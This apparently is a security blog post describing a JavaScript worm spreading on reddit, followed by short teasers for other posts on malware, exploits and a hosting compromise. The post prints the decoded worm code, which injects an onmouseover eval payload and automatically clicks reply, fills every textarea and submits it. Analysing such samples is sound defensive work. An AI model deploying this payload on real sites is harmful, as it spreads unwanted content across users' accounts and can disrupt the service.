As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: worm author has happily shared its way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
Malware represents a common threat for all users out there surfing the web. It doesn’t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads).
(continue)
An exploit (from the same word in the French language, meaning “achievement”, or “accomplishment”) is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). This frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack. (Wikipedia)
(continue)
In the last period of time malware authors started focusing more and more on exploiting Adobe Reader (and ultimately users computers) via maliciously crafted documents. And vulnerabilities in Adobe Reader have been quite a few lately.
Adobe Reader oriented attack was also the malicious injection on my last hosting service…
(continue)
As you may have seen, in the last couple of days this blog was inactive, or under movement… All this happened due to a possible attack on my last hosting provider. And I said possible because I imagined multiple scenarios in which it could have happened.
(continue)
Malware represents a common threat for all users out there surfing the web. It doesn’t have ethics or a message to spread, like viruses used to have (not all had dangerous payloads).
(continue)
Recently I read an article in the (IN)SECURE Magazine 19 entitled The Future Of AV: looking for the good while stopping the bad
. After my opinion there should be more to be said about it, based on the article.
(continue)